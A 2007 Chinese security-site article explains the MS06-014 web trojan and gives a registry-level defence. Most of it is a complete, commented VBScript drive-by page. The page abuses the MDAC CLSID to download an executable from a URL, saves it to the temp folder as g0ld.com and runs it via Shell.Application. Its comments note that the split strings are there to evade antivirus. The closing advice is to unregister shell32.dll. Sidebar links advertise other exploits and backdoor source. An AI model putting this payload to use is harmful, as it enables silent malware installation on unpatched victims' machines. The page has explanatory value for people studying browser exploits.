精典的ASP传奇的J2EE新生的NETFTP服务器服务器安全WINDOWSB/S 模式WEB安全WAP世界动态网站推广宣传
空间服务器数据库技术邮局服务器站長工具硬设与组建Alexa专题DHTML项目管理WEB标准电脑硬件
病毒知识电脑使用布线协议接入交换路由局域网无线网络网络规划
Visual BasicVisual C/C++MssqlMySqloracleSybase 存在安全风险进程系统进程列表应用程序进程列表其它进程列表
黑客编程漏洞分析本地提权免杀技术脚本漏洞数据库注入安全防护内网渗透加密解密工具使用
WAP技术WAP入门
 您的位置:   >> 相关知识 >> 病毒木马 >> 病毒知识 >>

剖析网页木马(ms06014)原理及防木马狠招

合金网络科技

 
  添加日期:2007-4-13 点击次数:32次  
   
  析网页木马(ms06014)原理及防木马狠招

首先!让我们来看看网上普遍流行的网页木马的原版(ms06014漏洞)代码吧!


<html>
<script language='VBScript'>
on error resume next '防止程序意外出错而中止运行
dl = 'http://www.baidu.com/go.exe' '指定网站中的木马程序URL
Set df = document.createElement('object') '创建项目
df.setAttribute 'classid', 'clsid:BD96C556-65A3-11D0-983A-00C04FC29E36'
'对此项目进行编码
'注意:clsid:XXXX这一串就是我们为什么会中马的源泉,这就是网上流传的微软06014远程执行代码漏洞(msadco.dll)
str='Microsoft.XMLHTTP' '创建一个XMLHTTP对象
Set x = df.CreateObject(str,'')
a1='Ado'
a2='db.'
a3='Str'
a4='eam'                   字串3
str1=a1&a2&a3&a4          '黑客编写这种网页木马的原理其实是一样的;
str5=str1                 '为了免杀而在这里调换各种语句以达到免杀的目的或者能过加密,或将各种特征码的拆分/组合来达到免杀.
set S = df.createobject(str5,'') ''创建一个文件流对象
S.type = 1
str6='GET'
x.Open str6, dl, False
x.Send '以上步骤为从网站上下载指定的木马程序
fname1='g0ld.com'
set F = df.createobject('Scripting.FileSystemObject','') '建立一个文件对象
set tmp = F.GetSpecialFolder(2) 'GetSpecialFolder(2) '得到系统临时目录的路径
fname1= F.BuildPath(tmp,fname1) '注入到g0ld.com
S.open
S.write x.responseBody '把下载的文件写入数据流中
S.savetofile fname1,2  '把数据流存为文件,在系统临时目录里保存为g0ld.com
S.close
set Q = df.createobject('Shell.Application','') '大家请注意这里 字串2
'createobject('Shell.Application',''),即创建一个shell对象
Q.ShellExecute fname1,'','','open',0 '执行被下载下来的网页木马
</script>
<head>
<title>Oh,my god!</title>
</head><body>
<center>You DO it!</center>
</body></html>

======如果你的IE没有打补丁,那么你浏览了这样的网页,你就会中马了,以下为解决办法=======

set Bb = data.createobject('Shell.Application','')
Q.ShellExecute fname1,'','','open',0 '

以上下载保存我们不管,因为木马被保存在本地了不可怕,因为它这个时候还没有被执行还起不了任何作用.
只要我们将Shell.application控件停用,被下载的木马就不能通过上面这2条语远来获得网页执行程序的权限了.

方法为:在命令提示符下输入'regsvr32.exe shell32.dll /u/s',然后回车就OK了....意思是说,即使我们IE有漏洞,木马被下载下来

也不会被执行.

不管你的IE有没有打补丁,我们的电脑就不会再沦为别人的肉鸡了...

字串4


以后我们如果还需要使用Shell.application控件 就可以在命令提示符下输入'regsvr32.exe shell32.dll /i/s'以重新注册这个控件.
精典的ASP精选TOP
· 利用ADODB.Stream 防盗链
· Adodb.Stream说明手册
· 采集需要登录
· ASP 判断远程图片是否存在
· 在ServerXMLHTTP组件中使用代理服务器
· 用XMLHTTP通过代理服务器从服务提取数据的一些问题
· objXML.readystate的值
· 互联网HTTP连接等出错代码大全
· 利用XMLHTTP实现的二级连动Select
· 利用 xmlhttp 分块上传文件
 
服务器安全点击TOP
· 新云最新漏洞总结篇
· 各类网站的默认数据库和密码
· Windows Server2003 防木马权限设置IIS服务器安全配置整理
· 针对ASP网站的Win 2003硬盘安全设置
· IIS 6 的PHP 最佳配置方法
· 利用SA.exe 将Iusr_victim克隆为Administrator
· Cmd模式下的入侵技术大全
· 破解网页代码加密
· SERV-U 6.4提权方法,通杀SERV-U版本
· 新云网站管理系统文件注入漏洞
 
硬设与组建点击TOP
· 从头到尾教你组建小型局域网20
· 从头到尾教你组建小型局域网19
· 从头到尾教你组建小型局域网18
· 从头到尾教你组建小型局域网17
· 从头到尾教你组建小型局域网16
· 从头到尾教你组建小型局域网15
· 从头到尾教你组建小型局域网14
· 从头到尾教你组建小型局域网13
· 从头到尾教你组建小型局域网12
· 从头到尾教你组建小型局域网11
 
病毒知识点击TOP
· 不再重装 手动清除顽固病毒AutoRUN
· 木马静态变动态 DLL木马程序大揭秘
· 详解一个很牛X的网马
· 一个网马
· Trojan-Downloader.Win32.Delf.bab
· 抓了一个AJAX的网马
· 迅雷5 最新0day利用程序
· 自动关掉270种杀毒软件
· RealPlayer 最新网马
· 五个反弹型后门的源代码
 
WINDOWS点击TOP
· 4【系统知识】常见文件扩展名及简要说明!!! ==超详尽==
· 3【系统知识】常见文件扩展名及简要说明!!! ==超详尽==
· 2【系统知识】常见文件扩展名及简要说明!!! ==超详尽==
· 1【系统知识】常见文件扩展名及简要说明!!! ==超详尽==
· Capture an HTML document as an image
· 如何给eWebEditor编辑器加上运行代码框功能
· 给CuteEditor5增加了高亮代码显示功能
· CuteEditor6.0使用配置心得体会
· 关于IE插件的CLSID问题
· 对开发的程序(制作CAB)进行签名,并允许网站中使用
  "凌风微型文章系统",针对"搜索引擎"完美设计,提高"搜索引擎"对网站容量,质量的评估值,"扁平化,转静态 ..."